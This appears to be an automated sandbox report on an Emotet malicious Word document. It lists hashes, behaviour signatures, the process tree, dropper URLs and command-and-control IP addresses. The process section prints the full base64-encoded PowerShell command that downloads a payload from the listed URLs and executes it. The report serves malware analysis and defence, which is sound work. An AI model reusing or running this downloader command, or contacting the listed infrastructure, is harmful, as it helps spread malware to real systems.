Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    29-07-2020 07:17

General

  • Target

    emotet_e1_7874a727f8ba83b97c4889bdde4b39fe644e52279b8f25336c1f7b03ee7ea5b9_2020-07-29__071700._doc.doc

  • Size

    172KB

  • MD5

    2e5604fc710cb5f7d0802eed16d9974b

  • SHA1

    1d3b14e0647a32071714a9c318e7ba88fcac9b36

  • SHA256

    7874a727f8ba83b97c4889bdde4b39fe644e52279b8f25336c1f7b03ee7ea5b9

  • SHA512

    58104d7c98bd3dcaf7d32b8ab75c3051ba1ce631f38e84ad5dba74319d364d88f9d9efafb54508ea7dbf9812af4dce2a5dc2ab61f74dd2b6d04a7e5d8df7056e

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://eldridgelondon.com/wp-admin/QS/

exe.dropper

http://empmtg.com/guestbook/uQ4qC339/

exe.dropper

http://elisent.com/assets/ReH6966/

exe.dropper

http://elifmakina.net/ww4w/WnRLv/

exe.dropper

http://eliteseobusiness.com/takeout.eliteseobusiness.com/GYa538680/

Extracted

Family

emotet

C2

179.60.229.168:443

185.94.252.13:443

189.218.165.63:80

77.90.136.129:8080

217.199.160.224:7080

104.131.41.185:8080

2.47.112.152:80

185.94.252.27:443

186.250.52.226:8080

51.255.165.160:8080

68.183.170.114:8080

191.99.160.58:80

104.131.103.37:8080

181.31.211.181:80

202.62.39.111:80

83.169.21.32:7080

87.106.46.107:8080

72.47.248.48:7080

177.75.143.112:443

190.17.195.202:80

rsa_pubkey.plain

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_7874a727f8ba83b97c4889bdde4b39fe644e52279b8f25336c1f7b03ee7ea5b9_2020-07-29__071700._doc.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:2584
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABOAFYARgBLAEwAdQB6AGcAPQAnAEoAUQBQAEkASgBiAHYAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAYABVAFIAYABpAHQAWQBQAFIATwBUAG8AQwBgAE8ATAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAFAAUwBVAEMAVAB6AGMAZAAgAD0AIAAnADkAMAAzACcAOwAkAFcAWABDAEQAWgBwAHMAbgA9ACcATABHAFoAUQBTAG8AZQBvACcAOwAkAEQASABFAEMAUwBpAG0AeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUABTAFUAQwBUAHoAYwBkACsAJwAuAGUAeABlACcAOwAkAFMAVwBLAEQATAB0AGMAaQA9ACcASABJAFMARwBPAGIAawBnACcAOwAkAEoATABEAEIATABpAGkAZgA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQAWQBRAEwAUQBZAGcAaQBnAD0AJwBoAHQAdABwADoALwAvAGUAbABkAHIAaQBkAGcAZQBsAG8AbgBkAG8AbgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AUQBTAC8AKgBoAHQAdABwADoALwAvAGUAbQBwAG0AdABnAC4AYwBvAG0ALwBnAHUAZQBzAHQAYgBvAG8AawAvAHUAUQA0AHEAQwAzADMAOQAvACoAaAB0AHQAcAA6AC8ALwBlAGwAaQBzAGUAbgB0AC4AYwBvAG0ALwBhAHMAcwBlAHQAcwAvAFIAZQBIADYAOQA2ADYALwAqAGgAdAB0AHAAOgAvAC8AZQBsAGkAZgBtAGEAawBpAG4AYQAuAG4AZQB0AC8AdwB3ADQAdwAvAFcAbgBSAEwAdgAvACoAaAB0AHQAcAA6AC8ALwBlAGwAaQB0AGUAcwBlAG8AYgB1AHMAaQBuAGUAcwBzAC4AYwBvAG0ALwB0AGEAawBlAG8AdQB0AC4AZQBsAGkAdABlAHMAZQBvAGIAdQBzAGkAbgBlAHMAcwAuAGMAbwBtAC8ARwBZAGEANQAzADgANgA4ADAALwAnAC4AIgBTAGAAUABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEsAUwBHAFYAUwBnAHgAdgA9ACcASwBBAFcAVABFAG0AcABtACcAOwBmAG8AcgBlAGEAYwBoACgAJABOAFoAWQBUAFYAdgByAGsAIABpAG4AIAAkAFkAUQBMAFEAWQBnAGkAZwApAHsAdAByAHkAewAkAEoATABEAEIATABpAGkAZgAuACIARABPAHcAbgBgAGwAbwBBAEQAZgBgAEkAYABMAEUAIgAoACQATgBaAFkAVABWAHYAcgBrACwAIAAkAEQASABFAEMAUwBpAG0AeQApADsAJABIAFQATABKAEIAcgBuAGwAPQAnAEkARQBSAFgARgBsAGYAdQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEQASABFAEMAUwBpAG0AeQApAC4AIgBsAGAARQBOAEcAYABUAGgAIgAgAC0AZwBlACAAMwA3ADMANwAwACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAGAAUgBFAGAAQQB0AEUAIgAoACQARABIAEUAQwBTAGkAbQB5ACkAOwAkAFgARABFAEYAUQBqAHMAaQA9ACcATgBFAEcAUgBDAGEAZABuACcAOwBiAHIAZQBhAGsAOwAkAEIAUQBPAEkASABiAG8AcgA9ACcATQBWAEwATwBLAHEAbwBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQATgBWAFoASgBpAGkAeAA9ACcAQwBNAFAAWABCAHkAaABzACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    PID:2980
  • C:\Users\Admin\903.exe
    C:\Users\Admin\903.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:3812
    • C:\Windows\SysWOW64\winhttp\mycomput.exe
      "C:\Windows\SysWOW64\winhttp\mycomput.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      PID:1136

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1136-9-0x0000000001FE0000-0x0000000001FEC000-memory.dmp

    Filesize

    48KB

  • memory/3812-6-0x0000000000650000-0x000000000065C000-memory.dmp

    Filesize

    48KB